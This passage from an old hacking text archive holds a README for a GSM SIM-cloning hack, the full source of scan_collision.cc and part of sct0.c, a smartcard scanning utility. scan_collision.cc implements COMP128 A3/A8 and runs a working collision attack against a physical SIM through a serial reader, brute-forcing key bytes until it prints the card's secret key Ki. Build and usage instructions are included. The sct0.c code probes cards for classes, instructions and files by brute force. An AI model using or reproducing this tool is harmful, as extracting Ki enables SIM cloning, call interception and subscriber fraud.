  2626. and the latest version of this hack at ftp://www.ccc.de/pub/gsm.
  2627.  
  2628. This archive contains a patched sct0.c, which makes this work with
  2629. the CCC UniProg and SerProg chipcard interfaces.
  2630.  
  2631. Information about this hack is available at http://www.scard.org. This
  2632. implementation is by andreas@ccc.de.
  2633.  
  2634. Type 'make scan_collision' to build the executable. Type 
  2635.  
  2636. './scan_collision <PIN> <timeout>'
  2637.  
  2638. to start scanning. The PIN is the PIN of the card. timeout is the time
  2639. the card should wait for the response, the GSM standard specifies that to
  2640. be 50ms, give 50000 here.
  2641.  
  2642. You have to change the serial device and communication parameters in
  2643. the source. Sorry.
  2644.  
  2645. Andreas
  2646.  
  2647. ------------ FIN -------------------------------------------------------------
  2648.  
  2649.   File : scan_collision.cc
  2650.  
  2651. ------------ Codigo Fuente ---------------------------------------------------
  2652.  
  2653. #include <map.h>
  2654. #include <stdio.h>
  2655. #include <ctype.h>
  2656. #include "getresponse.h"
  2657.  
  2658. #undef TEST
  2659.  
  2660. typedef unsigned char Byte;
  2661.  
  2662.  
  2663. struct ltsim {
  2664.   bool operator()(const Byte* b1, const Byte* b2) const {
  2665.     return memcmp(b1, b2, 12) < 0;
  2666.   }
  2667. };
  2668.  
  2669. typedef map<const Byte*, const Byte*, ltsim> simoutput_map;
  2670.  
  2671. /* An implementation of the GSM A3A8 algorithm.  (Specifically, COMP128.) 
  2672.  */
  2673.  
  2674. /* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner.
  2675.  * All rights reserved.
  2676.  */
  2677.  
  2678. /*
  2679.  * For expository purposes only.  Coded in C merely because C is a much
  2680.  * more precise, concise form of expression for these purposes.  See Judge
  2681.  * Patel if you have any problems with this...
  2682.  * Of course, it's only authentication, so it should be exportable for the
  2683.  * usual boring reasons.
  2684.  */
  2685.  
  2686. /* The compression tables. */
  2687. static const Byte table_0[512] = {
  2688.         102,177,186,162,  2,156,112, 75, 55, 25,  8, 12,251,193,246,188,
  2689.         109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161,
  2690.         252, 37,244, 47, 64,211,  6,237,185,160,139,113, 76,138, 59, 70,
  2691.          67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116,
  2692.         247,194, 41, 84, 71,  1, 49, 14, 95, 35,169, 21, 96, 78,215,225,
  2693.         182,243, 28, 92,201,118,  4, 74,248,128, 17, 11,146,132,245, 48,
  2694.         149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176,
  2695.         250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121,
  2696.          61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196,
  2697.          56,197,158,  0,100, 45,153,  7,144,222,163,167, 60,135,210,231,
  2698.         174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255,
  2699.         239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82,
  2700.         104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198,  5,
  2701.          57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226,
  2702.         184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23,
  2703.          80,159,134,111,  9,114,  3, 91, 16,130, 83, 10,195,240,253,119,
  2704.         177,102,162,186,156,  2, 75,112, 25, 55, 12,  8,193,251,188,246,
  2705.         213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108,
  2706.          37,252, 47,244,211, 64,237,  6,160,185,113,139,138, 76, 70, 59,
  2707.          26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207,
  2708.         194,247, 84, 41,  1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215,
  2709.         243,182, 92, 28,118,201, 74,  4,128,248, 11, 17,132,146, 48,245,
  2710.          90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137,
  2711.          27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32,
  2712.         103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172,
  2713.         197, 56,  0,158, 45,100,  7,153,222,144,167,163,135, 60,231,210,
  2714.         165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125,
  2715.          54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192,
  2716.         170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46,  5,198,
  2717.         254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147,
  2718.         218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154,
  2719.         159, 80,111,134,114,  9, 91,  3,130, 16, 10, 83,240,195,119,253
  2720.     }, table_1[256] = {
  2721.          19, 11, 80,114, 43,  1, 69, 94, 39, 18,127,117, 97,  3, 85, 43,
  2722.          27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79,  4, 14, 59, 11,  5,
  2723.          35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120,  6,
  2724.          53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20,
  2725.          90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101,  8, 19, 78,
  2726.          76, 66,104, 46,111, 50, 32,  3, 39,  0, 58, 25, 92, 22, 18, 51,
  2727.          57, 65,119,116, 22,109,  7, 86, 59, 93, 62,110, 78, 99, 77, 67,
  2728.          12,113, 87, 98,102,  5, 88, 33, 38, 56, 23,  8, 75, 45, 13, 75,
  2729.          95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106,  2,103, 29,
  2730.          82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40,  7,114,
  2731.          82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97,  9, 54, 55, 74,
  2732.         113,123, 17, 26, 53, 58,  4,  9, 69,122, 21,118, 42, 60, 27, 73,
  2733.         118,125, 34, 15, 65,115, 84, 64, 62, 81, 70,  1, 24,111,121, 83,
  2734.         104, 81, 49,127, 48,105, 31, 10,  6, 91, 87, 37, 16, 54,116,126,
  2735.          31, 38, 13,  0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52,
  2736.         101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90,  2,119,122, 35
  2737.     }, table_2[128] = {
  2738.          52, 50, 44,  6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43,
  2739.          37,  4, 40, 34, 61, 12, 28,  4, 58, 23,  8, 15, 12, 22,  9, 18,
  2740.          55, 10, 33, 35, 50,  1, 43,  3, 57, 13, 62, 14,  7, 42, 44, 59,
  2741.          62, 57, 27,  6,  8, 31, 26, 54, 41, 22, 45, 20, 39,  3, 16, 56,
  2742.          48,  2, 21, 28, 36, 42, 60, 33, 34, 18,  0, 11, 24, 10, 17, 61,
  2743.          29, 14, 45, 26, 55, 46, 11, 17, 54, 46,  9, 24, 30, 60, 32,  0,
  2744.          20, 38,  2, 30, 58, 35,  1, 16, 56, 40, 23, 48, 13, 19, 19, 27,
  2745.          31, 53, 47, 38, 63, 15, 49,  5, 37, 53, 25, 36, 63, 29,  5,  7
  2746.     }, table_3[64] = {
  2747.           1,  5, 29,  6, 25,  1, 18, 23, 17, 19,  0,  9, 24, 25,  6, 31,
  2748.          28, 20, 24, 30,  4, 27,  3, 13, 15, 16, 14, 18,  4,  3,  8,  9,
  2749.          20,  0, 12, 26, 21,  8, 28,  2, 29,  2, 15,  7, 11, 22, 14, 10,
  2750.          17, 21, 12, 30, 26, 27, 16, 31, 11,  7, 13, 23, 10,  5, 22, 19
  2751.     }, table_4[32] = {
  2752.          15, 12, 10,  4,  1, 14, 11,  7,  5,  0, 14,  7,  1,  2, 13,  8,
  2753.          10,  3,  4,  9,  6,  0,  3,  2,  5,  6,  8,  9, 11, 13, 15, 12
  2754.     }, *table[5] = { table_0, table_1, table_2, table_3, table_4 };
  2755.  
  2756. /*
  2757.  * rand[0..15]: the challenge from the base station
  2758.  * key[0..15]: the SIM's A3/A8 long-term key Ki
  2759.  * simoutput[0..11]: what you'd get back if you fed rand and key to a real
  2760.  * SIM.
  2761.  *
  2762.  *   The GSM spec states that simoutput[0..3] is SRES,
  2763.  *   and simoutput[4..11] is Kc (the A5 session key).
  2764.  *   (See GSM 11.11, Section 8.16.  See also the leaked document
  2765.  *   referenced below.)
  2766.  *   Note that Kc is bits 74..127 of the COMP128 output, followed by 10
  2767.  *   zeros.
  2768.  *   In other words, A5 is keyed with only 54 bits of entropy. This
  2769.  *   represents a deliberate weakening of the key used for voice privacy
  2770.  *   by a factor of over 1000.
  2771.  * 
  2772.  * Verified with a Pacific Bell Schlumberger SIM.  Your mileage may vary.
  2773.  *
  2774.  * Marc Briceno <marc@scard.org>, Ian Goldberg <iang@cs.berkeley.edu>,
  2775.  * and David Wagner <daw@cs.berkeley.edu>
  2776.  *//*
  2777.  * This code derived from a leaked document from the GSM standards.
  2778.  * Some missing pieces were filled in by reverse-engineering a working SIM.
  2779.  * We have verified that this is the correct COMP128 algorithm.
  2780.  * 
  2781.  * The first page of the document identifies it as
  2782.  *      _Technical Information: GSM System Security Study_.
  2783.  *      10-1617-01, 10th June 1988.
  2784.  * The bottom of the title page is marked
  2785.  *      Racal Research Ltd.
  2786.  *      Worton Drive, Worton Grange Industrial Estate,
  2787.  *      Reading, Berks. RG2 0SB, England.
  2788.  *      Telephone: Reading (0734) 868601   Telex: 847152
  2789.  * The relevant bits are in Part I, Section 20 (pages 66--67).  Enjoy!
  2790.  * 
  2791.  * Note: There are three typos in the spec (discovered by
  2792.  * reverse-engineering).
  2793.  * First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read
  2794.  * "z = (2 * x[m] + x[n]) mod 2^(9-j)".
  2795.  * Second, the "k" loop in the "Form bits from bytes" section is severely
  2796.  * botched: the k index should run only from 0 to 3, and clearly the range
  2797.  * on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8,
  2798.  * to be consistent with the subsequent section).
  2799.  * Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as
  2800.  * claimed in the document.  (And the document doesn't specify how Kc is
  2801.  * derived, but that was also easily discovered with reverse engineering.)
  2802.  * All of these typos have been corrected in the following code.
  2803.  */
  2804.  
  2805. void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
  2806.     /* out */ Byte simoutput[12])
  2807. {
  2808.     Byte x[32], bit[128];
  2809.     int i, j, k, l, m, n, y, z, next_bit;
  2810.  
  2811.     /* ( Load RAND into last 16 bytes of input ) */
  2812.     for (i=16; i<32; i++)
  2813.         x[i] = rand[i-16];
  2814.  
  2815.     /* ( Loop eight times ) */
  2816.     for (i=1; i<9; i++) {
  2817.         /* ( Load key into first 16 bytes of input ) */
  2818.         for (j=0; j<16; j++)
  2819.             x[j] = key[j];
  2820.         /* ( Perform substitutions ) */
  2821.         for (j=0; j<5; j++)
  2822.             for (k=0; k<(1<<j); k++)
  2823.                 for (l=0; l<(1<<(4-j)); l++) {
  2824.                     m = l + k*(1<<(5-j));
  2825.                     n = m + (1<<(4-j));
  2826.                     y = (x[m]+2*x[n]) % (1<<(9-j));
  2827.                     z = (2*x[m]+x[n]) % (1<<(9-j));
  2828.                     x[m] = table[j][y];
  2829.                     x[n] = table[j][z];
  2830.                 }
  2831.         /* ( Form bits from bytes ) */
  2832.         for (j=0; j<32; j++)
  2833.             for (k=0; k<4; k++)
  2834.                 bit[4*j+k] = (x[j]>>(3-k)) & 1;
  2835.         /* ( Permutation but not on the last loop ) */
  2836.         if (i < 8)
  2837.             for (j=0; j<16; j++) {
  2838.                 x[j+16] = 0;
  2839.                 for (k=0; k<8; k++) {
  2840.                     next_bit = ((8*j + k)*17) % 128;
  2841.                     x[j+16] |= bit[next_bit] << (7-k);
  2842.                 }
  2843.             }
  2844.     }
  2845.  
  2846.     /*
  2847.      * ( At this stage the vector x[] consists of 32 nibbles.
  2848.      *   The first 8 of these are taken as the output SRES. )
  2849.      */
  2850.  
  2851.     /* The remainder of the code is not given explicitly in the
  2852.      * standard, but was derived by reverse-engineering.
  2853.      */
  2854.  
  2855.     for (i=0; i<4; i++)
  2856.         simoutput[i] = (x[2*i]<<4) | x[2*i+1];
  2857.     for (i=0; i<6; i++)
  2858.         simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2)
  2859.                 | (x[2*i+18+2]>>2);
  2860.     simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2);
  2861.     simoutput[4+7] = 0;
  2862. }
  2863.  
  2864. int hextoint(char x)
  2865. {
  2866.   x = toupper(x);
  2867.   if (x >= 'A' && x <= 'F')
  2868.     return x-'A'+10;
  2869.   else if (x >= '0' && x <= '9')
  2870.     return x-'0';
  2871.   fprintf(stderr, "bad input.\n");
  2872.   exit(1);
  2873.   return 0;
  2874. }
  2875.  
  2876. int main(int argc, char **argv)
  2877. {
  2878.   Byte pin[8] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
  2879.   Byte key[16], simoutput[12];
  2880.   int i,j,k,l;
  2881.   simoutput_map* simmap;
  2882.   Byte* collision_map[8][2];
  2883.  
  2884. #ifdef TEST
  2885.   if (argc != 2 || strlen(argv[1]) != 34
  2886.       || strncmp(argv[1], "0x", 2) != 0) {
  2887.     fprintf(stderr, "Usage: %s 0x<key>\n", argv[0]);
  2888.     exit(1);
  2889.   }
  2890.  
  2891.   for (i=0; i<16; i++)
  2892.     key[i] = (hextoint(argv[1][2*i+2])<<4)
  2893.       | hextoint(argv[1][2*i+3]);
  2894. #else
  2895.   if (argc != 3) {
  2896.     fprintf(stderr, "Usage: %s <PIN> <timeout>\n", argv[0]);
  2897.     exit(1);
  2898.   }
  2899.  
  2900.   for (i=0; i<strlen(argv[1]) && i<8; i++) {
  2901.     pin[i] = argv[1][i];
  2902.   }
  2903.   
  2904.   set_timeout(atoi(argv[2]));
  2905.  
  2906. #endif
  2907.  
  2908.   init_card("/dev/ttyS1", pin);
  2909.  
  2910.   for(i=0; i < 8; i++) {
  2911.     simmap = new simoutput_map;
  2912.     collision_map[i][0] = NULL;
  2913.     collision_map[i][1] = NULL;
  2914.     for(j=0; j<256; j++) {
  2915.       fprintf(stderr, ".");
  2916.       for(k=0; k<256; k++) {
  2917.           Byte* newrand = new Byte[16];
  2918.     memset(newrand, 0, 16); 
  2919.     newrand[i+8] = k;
  2920.     newrand[i] = j;
  2921.  
  2922.     Byte* newoutput = new Byte[12];
  2923.  
  2924. #ifdef TEST
  2925.     A3A8(newrand, key, newoutput);
  2926. #else
  2927.     get_response(newrand, newoutput);
  2928. #endif
  2929.     if(simmap->count(newoutput)) {
  2930.       printf("\nCollision for i=%i: ", i);
  2931.       for (l=0; l<16; l++)
  2932.         printf("%02X", newrand[l]);
  2933.       printf(" ");
  2934.       for (l=0; l<16; l++)
  2935.         printf("%02X", (*simmap)[newoutput][l]);
  2936.       j=256; k=256;
  2937.       collision_map[i][0] = new Byte[16];
  2938.       collision_map[i][1] = new Byte[16];
  2939.       memcpy(collision_map[i][0], newrand, 16);
  2940.       memcpy(collision_map[i][1], (*simmap)[newoutput], 16);
  2941.  
  2942.     } else {
  2943. #ifdef VERBOSE
  2944.       for (l=0; l<16; l++)
  2945.         printf("%02X", newrand[l]);
  2946.       printf(" ");
  2947.       for (l=0; l<12; l++)
  2948.         printf("%02X", newoutput[l]);
  2949.       printf("\n");
  2950. #endif
  2951.       (*simmap)[newoutput]=newrand;
  2952.     }
  2953.     fflush(stdout);
  2954.       }
  2955.     }
  2956.     printf("\n");
  2957.     for(simoutput_map::iterator I=simmap->begin(); I!=simmap->end(); I++) {
  2958.       delete (*I).first;
  2959.       delete (*I).second;
  2960.       //      simmap.erase(I);
  2961.     }
  2962.     delete simmap;
  2963.   }
  2964.  
  2965.   Byte newkey[16];
  2966.   Byte resultkey[16];
  2967.   Byte res1[16], res2[16];
  2968.  
  2969.   memset(resultkey, 0, 16);
  2970.  
  2971.   for(i=0; i<8; i++) {
  2972.     memset(newkey, 0, 16);
  2973.     for(j=0; j<256; j++) {
  2974.       newkey[i]=j;
  2975.       fprintf(stderr, ".");
  2976.       for(k=0; k<256; k++) {
  2977.     newkey[i+8]=k;
  2978.     A3A8(collision_map[i][0], newkey, res1);
  2979.     A3A8(collision_map[i][1], newkey, res2);
  2980.     if(!memcmp(res1, res2, 12)) {
  2981.       resultkey[i]=j;
  2982.       resultkey[i+8]=k;
  2983.       printf("\nKey bytes found, Ki so far: ");
  2984.       for (l=0; l<16; l++)
  2985.         printf("%02X", resultkey[l]);
  2986.       j = 256; k = 256;
  2987.     }
  2988.       }
  2989.     }
  2990.     printf("\n");
  2991.   }
  2992.   printf("\nAnd the Ki is: ");
  2993.   for (l=0; l<16; l++)
  2994.     printf("%02X", resultkey[l]);
  2995.   printf("\n");
  2996.  
  2997.   return 0;
  2998. }
  2999.  
  3000. ------------ FIN -------------------------------------------------------------
  3001.  
  3002.   File : SCT0.C
  3003.  
  3004. ------------ Codigo Fuente ---------------------------------------------------
  3005.  
  3006. /* sct0.c    - Smartcard T=0 related functions
  3007.  *
  3008.  * Copyright 1993-1997, Tim Hudson. All rights reserved.
  3009.  *
  3010.  * You can pretty much do what you like with this code except pretend that 
  3011.  * you wrote it provided that any derivative of this code includes the
  3012.  * above comments unchanged. If you put this in a product then attribution
  3013.  * is mandatory. See the details in the COPYING file.
  3014.  *
  3015.  * Tim Hudson
  3016.  * tjh@cryptsoft.com
  3017.  *
  3018.  */
  3019.  
  3020. #include <stdio.h>
  3021. #include <ctype.h>
  3022. #include <stdlib.h>
  3023. #include <string.h>
  3024.  
  3025. #include "sio.h"
  3026. #include "sct0.h"
  3027.  
  3028. static int dbglev=0;
  3029. static SLOG *outf=NULL;
  3030.  
  3031. /* max number of times we retry a probe when we don't get back
  3032.  * something that is a valid response 
  3033.  */
  3034. #define MAX_RETRIES  2
  3035.  
  3036. int SCT0_SetDebug(int lev)
  3037. {
  3038.   int oldlev;
  3039.  
  3040.   oldlev=dbglev;
  3041.   dbglev=lev;
  3042.   return(oldlev);
  3043. }
  3044.  
  3045. int SCT0_GetDebug(void)
  3046. {
  3047.   return(dbglev);
  3048. }
  3049.  
  3050. int SCT0_SetDebugLog(SLOG *slog)
  3051. {
  3052.   if (outf!=NULL)
  3053.     SLOG_close(outf);
  3054.   outf=slog;
  3055.   return(1);
  3056. }
  3057.  
  3058. int SCT0_Reset(SIO_INFO *s)
  3059. {
  3060.   int ch;
  3061.  
  3062.   /* flush any data in the buffer - this is important */
  3063.   while ((ch=SIO_ReadChar(s))!=-1)
  3064.     ;
  3065.  
  3066.   /* toggle RTS to trigger reset */
  3067. #if 0
  3068.   SIO_DropRTS(s);
  3069.   SIO_Delay(s,25);
  3070.   SIO_RaiseRTS(s);
  3071.   SIO_Delay(s,25);
  3072. #endif
  3073. #if 1
  3074.   SIO_RaiseRTS(s);
  3075.   SIO_Delay(s,25);
  3076.   SIO_DropRTS(s);
  3077.   SIO_Delay(s,25);
  3078. #endif
  3079.  
  3080.   return(1);
  3081. }
  3082.  
  3083. int SCT0_GetATR(SIO_INFO *s,char *buf,int bufsize)
  3084. {
  3085.   int i,n,ch;
  3086.  
  3087.   SCT0_Reset(s);
  3088.  
  3089.   /* now read in whatever data is available */
  3090.   n=0;
  3091.   /* we have two shots at doing this ... some cards are a little 
  3092.    * slow at responding 
  3093.    */
  3094.   for(i=0;i<2;i++) {
  3095.     while ((ch=SIO_ReadChar(s))!=-1) {
  3096.       if (buf!=NULL) {
  3097.     if (n>=bufsize)
  3098.       break;
  3099.     buf[n++]=(ch & 0xff);
  3100.       }
  3101.     }
  3102.   }
  3103.   return(n);
  3104. }
  3105.  
  3106. /* we maintain a table of settings that it makes sense to scan through
  3107.  * when looking for the communication settings for use with a particular
  3108.  * smartcard ... the order here is setup to match the most likely things
  3109.  * first so you probably shouldn't play with it.
  3110.  */
  3111. static long all_speed[]={9600L,19200L,38400L,115200L};
  3112. static int all_parity[]={SIO_PARITY_EVEN,SIO_PARITY_ODD,SIO_PARITY_NONE};
  3113. static int all_databits[]={8,7};
  3114. static int all_stopbits[]={2,1};
  3115. static int all_iomode[]={SIO_IOMODE_DIRECT,SIO_IOMODE_INDIRECT};
  3116.  
  3117. #define N_all_speed (sizeof(all_speed)/sizeof(all_speed[0]))
  3118. #define N_all_parity (sizeof(all_parity)/sizeof(all_parity[0]))
  3119. #define N_all_databits (sizeof(all_databits)/sizeof(all_databits[0]))
  3120. #define N_all_stopbits (sizeof(all_stopbits)/sizeof(all_stopbits[0]))
  3121. #define N_all_iomode (sizeof(all_iomode)/sizeof(all_iomode[0]))
  3122.  
  3123. int SCT0_ScanForATR(SIO_INFO *s,char *ubuf,int ubufsiz)
  3124. {
  3125.   long aspeed;
  3126.   int aparity,adatabits,astopbits,aiomode;
  3127.   char buf[256];
  3128.   int len;
  3129.  
  3130.   for(aspeed=0;aspeed<N_all_speed;aspeed++)
  3131.     for(adatabits=0;adatabits<N_all_databits;adatabits++)
  3132.       for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
  3133.         for(aparity=0;aparity<N_all_parity;aparity++)
  3134.           for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
  3135.         SIO_SetSpeed(s,all_speed[aspeed]);
  3136.         SIO_SetDataBits(s,all_databits[adatabits]);
  3137.         SIO_SetStopBits(s,all_stopbits[astopbits]);
  3138.         SIO_SetParity(s,all_parity[aparity]);
  3139.         SIO_SetIOMode(s,all_iomode[aiomode]);
  3140.         SIO_WriteSettings(s);
  3141.         len=SCT0_GetATR(s,buf,sizeof(buf));
  3142.  
  3143.         if (dbglev)
  3144.           SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
  3145.         if (len>0) {
  3146.           if (dbglev) {
  3147.         /* dump the record */
  3148.         SLOG_printf(outf,"ATR-DATA: ");
  3149.         SLOG_dump(outf,buf,len,0);
  3150.         SLOG_printf(outf,"\n");
  3151.         SLOG_printf(outf,"ATR-TEXT: ");
  3152.         SLOG_dump(outf,buf,len,1);
  3153.         SLOG_printf(outf,"\n");
  3154.           }
  3155.           /* it has to be a valid ATR response before we
  3156.            * consider that it has worked 
  3157.            */
  3158.           if ((buf[0]==0x3f)||(buf[0]==0x3b)) {
  3159.         /* copy into the users buffer */
  3160.             if ((ubuf!=NULL)&&(len<=ubufsiz))
  3161.           memcpy(ubuf,buf,len);
  3162.         return(len);
  3163.           }
  3164.         }
  3165.       }
  3166.   return(0);
  3167. }
  3168.  
  3169. int SCT0_ScanClasses(SIO_INFO *s,char *classlist)
  3170. {
  3171.   int i,j,len;
  3172.   unsigned char buf[BUFSIZ];
  3173.   int retries,reset_done;
  3174.  
  3175.   /* flush data ... read until nothing available */
  3176.   while (SIO_ReadChar(s)!=-1)
  3177.     ;
  3178.  
  3179.   reset_done=retries=0;
  3180.   for(i=0;i<=255;i++) {
  3181. do_again: ;
  3182.     buf[0]=i;    /* CLA = 0 */
  3183.     buf[1]=0x0;
  3184.     buf[2]=0x0;
  3185.     buf[3]=0x0;
  3186.     buf[4]=0x0;
  3187.     len=SIO_WriteBuffer(s,buf,5);
  3188.  
  3189.     /* we need to delay before reading to give the reader time
  3190.      * to start responding
  3191.      */
  3192.     SIO_Delay(s,100);
  3193.  
  3194.     /* now read in some data */
  3195.     for(j=0;j<2;j++) {
  3196.       len=SIO_ReadBuffer(s,buf,sizeof(buf));
  3197.       if (len>0)
  3198.     break;
  3199.     }
  3200.  
  3201.     if (dbglev) {
  3202.       SLOG_printf(outf,"CLA 0x%02x: (%d) ",i,len);
  3203.       SLOG_dump(outf,buf,len,0);
  3204.       SLOG_printf(outf,"\n");
  3205.     }
  3206.  
  3207.     if (len!=2) {
  3208.       if (retries++>MAX_RETRIES) {
  3209.     if (!reset_done) {
  3210.       /* reset things ... some cards defend against 
  3211.        * a probe like this
  3212.        */
  3213.       SCT0_Reset(s);
  3214.       while (SIO_ReadChar(s)!=-1)
  3215.         ;
  3216.       reset_done++;
  3217.  
  3218.       if (dbglev) {
  3219.         SLOG_printf(outf,"CLA 0x%02x: SKIPPING with RESET\n",i);
  3220.       }
  3221.  
  3222.       /* skip to next INS */
  3223.       continue;
  3224.     }
  3225.     return (-1);
  3226.       }
  3227.       goto do_again;
  3228.     }
  3229.  
  3230.     /* process the result ... 6e 00 means the class doesn't exist */
  3231.     if (buf[0]!=0x6e)
  3232.       classlist[i]=1;
  3233.     else
  3234.       classlist[i]=0;
  3235.  
  3236.     reset_done=0;
  3237.  
  3238.   }
  3239.   return(1);
  3240. }
  3241.  
  3242. int SCT0_ScanInstructions(SIO_INFO *s,char theclass,char *inslist)
  3243. {
  3244.   int i,j,len;
  3245.   unsigned char buf[BUFSIZ];
  3246.   int retries;
  3247.  
  3248.   if (dbglev)
  3249.     SLOG_printf(outf,"INS scan for CLASS 0x%02x\n",theclass & 0xff);
  3250.  
  3251.   /* flush data ... read until nothing available */
  3252.   while (SIO_ReadChar(s)!=-1)
  3253.     ;
  3254.  
  3255.   retries=0;
  3256.  
  3257.   for(i=0;i<=255;i++) {
  3258. do_again: ;
  3259.     buf[0]=theclass;    /* CLA = 0 */
  3260.     buf[1]=i;           /* instruction */
  3261.     buf[2]=0x0;
  3262.     buf[3]=0x0;
  3263.     buf[4]=0x0;
  3264.     len=SIO_WriteBuffer(s,buf,5);
  3265.  
  3266.     /* we need to delay before reading to give the reader time
  3267.      * to start responding
  3268.      */
  3269.     SIO_Delay(s,100);
  3270.  
  3271.     /* now read in some data */
  3272.     for(j=0;j<2;j++) {
  3273.       len=SIO_ReadBuffer(s,buf,sizeof(buf));
  3274.       if (len>0)
  3275.     break;
  3276.     }
  3277.  
  3278.     if (dbglev) {
  3279.       SLOG_printf(outf,"INS 0x%02x: (%d) ",i,len);
  3280.       SLOG_dump(outf,buf,len,0);
  3281.       SLOG_printf(outf,"\n");
  3282.     }
  3283.  
  3284.     /* we could get back a response to a command that didn't
  3285.      * need any parameters ... which we should handle
  3286.      */
  3287.     if (len==3) {
  3288.       if ((buf[0] & 0xff)==i) {
  3289.     /* process the result ... 6e 00 or 6d 00 means the instruction
  3290.      * doesn't exist ... 6d=unknown, 6e=wrong
  3291.      */
  3292.     if ((buf[1]!=0x6e)&&(buf[1]!=0x6d))
  3293.       inslist[i]=1;
  3294.     else
  3295.       inslist[i]=0;
  3296.     continue;
  3297.       } else {
  3298.     /*
  3299.     SLOG_printf(outf,"len=3 i=0x%x buf[0]=0x%x\n",i,buf[0]);
  3300.     */
  3301.       }
  3302.     }
  3303.  
  3304.     if (len!=2) {
  3305.       if (retries++>MAX_RETRIES)
  3306.     return (-1);
  3307.       goto do_again;
  3308.     }
  3309.  
  3310.     /* process the result ... 6e 00 or 6d 00 means the instruction
  3311.      * doesn't exist ... 6d=unknown, 6e=wrong
  3312.      */
  3313.     if ((buf[0]!=0x6e)&&(buf[0]!=0x6d))
  3314.       inslist[i]=1;
  3315.     else
  3316.       inslist[i]=0;
  3317.  
  3318.   }
  3319.   return(1);
  3320. }
  3321.  
  3322. int SCT0_ScanFiles(SIO_INFO *s,char theclass,char thefile,char *filelist)
  3323. {
  3324.   int i,j,len;
  3325.   unsigned char buf[BUFSIZ];
  3326.   int retries;
  3327.  
  3328.   if (dbglev)
  3329.     SLOG_printf(outf,"FILE scan for CLASS 0x%02x file 0x%02x\n",
  3330.                 theclass & 0xff, thefile & 0xff);
  3331.  
  3332.   /* flush data ... read until nothing available */
  3333.   while (SIO_ReadChar(s)!=-1)
  3334.     ;
  3335.  
  3336.   retries=0;
  3337.  
  3338.   for(i=0;i<=255;i++) {
  3339. do_again: ;
  3340.     buf[0]=theclass;    /* CLA = 0 */
  3341.     buf[1]=0xa4;        /* instruction */
  3342.     buf[2]=0x0;
  3343.     buf[3]=0x0;
  3344.     buf[4]=0x2;
  3345.     len=SIO_WriteBuffer(s,buf,5);
  3346.  
  3347.     /* we need to delay before reading to give the reader time
  3348.      * to start responding
  3349.      */
  3350.     SIO_Delay(s,100);
  3351.  
  3352.     /* now read in some data - which should be the INS */
  3353.     for(j=0;j<2;j++) {
  3354.       len=SIO_ReadBuffer(s,buf,sizeof(buf));
  3355.       if (len>0)
  3356.     break;
  3357.     }
  3358.  
  3359.     if (dbglev) {
  3360.       SLOG_printf(outf,"FILE 0x%02x: (%d) [INS] ",i,len);
  3361.       SLOG_dump(outf,buf,len,0);
  3362.       SLOG_printf(outf,"\n");
  3363.     }
  3364.  
  3365.     if (len!=1) {
  3366.       if (retries++>MAX_RETRIES)
  3367.     return (-1);
  3368.       goto do_again;
  3369.     }
  3370.  
  3371.     /* we must get the INS back or things are broken! */
  3372.     if (buf[0]!=0xa4) {
  3373.       if (dbglev)
  3374.     SLOG_printf(outf,"ScanFiles - didn't get back INS - aborting scan\n");
  3375.       return (-1);
  3376.     }
  3377.  
  3378.     /* now send the file ID */
  3379.     buf[0]=thefile;    
  3380.     buf[1]=i;
  3381.     len=SIO_WriteBuffer(s,buf,2);
  3382.  
  3383.     /* we need to delay before reading to give the reader time
  3384.      * to start responding
  3385.      */
  3386.     SIO_Delay(s,100);
  3387.  
  3388.     /* now read in some data - which should be the response code */
  3389.     for(j=0;j<2;j++) {
  3390.       len=SIO_ReadBuffer(s,buf,sizeof(buf));
  3391.       if (len>0)
  3392.     break;
  3393.     }
  3394.  
  3395.     if (dbglev) {
  3396.       SLOG_printf(outf,"FILE 0x%02x: (%d) [RES] ",i,len);
  3397.       SLOG_dump(outf,buf,len,0);
  3398.       SLOG_printf(outf,"\n");
  3399.     }
  3400.  
  3401.     if (len!=2) {
  3402.       if (retries++>MAX_RETRIES)
  3403.     return (-1);
  3404.       goto do_again;
  3405.     }
  3406.  
